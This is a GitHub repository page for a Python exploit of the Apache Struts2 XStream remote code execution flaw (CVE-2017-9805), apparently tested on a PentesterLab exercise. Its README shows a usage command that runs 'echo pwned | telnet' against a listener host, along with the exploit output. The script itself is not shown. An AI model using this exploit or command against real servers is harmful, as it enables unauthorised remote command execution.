Skip to content
/ -CVE-2017-9805- Public

Exploit script for Apache Struts2 REST Plugin XStream RCE (‎CVE-2017-9805)

1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

jongmartinez/-CVE-2017-9805-

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
README.md
README.md
 
 
s2-052.py
s2-052.py
 
 

Repository files navigation

Vulnerability information

Resources: * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805

What is this?

A python exploit script capable of executing remote commands into the shell of a system hosting a Struts2 vulnerable to S2-052.

Usage

python s2-052.py --target 'http://192.168.0.233/orders/3' --command "echo pwned | telnet 192.168.0.122 1234"

[*] Apache Struts XStream REST vulnerability - S2-052
[*] Creating payload ...
[*] Exploit packet has 2582 bytes.
[*] Sending exploit packet ...
[+] Exploit packet has been sent.
listening on [any] 1234 ...
connect to [192.168.0.122] from vulnerable.lan [192.168.0.233] 55791
pwned

Tested on pentesterlab vulnerable machine of exercise s2-052.

About

Exploit script for Apache Struts2 REST Plugin XStream RCE (‎CVE-2017-9805)

Resources

Readme
Activity

Stars

1 star

Watchers

2 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages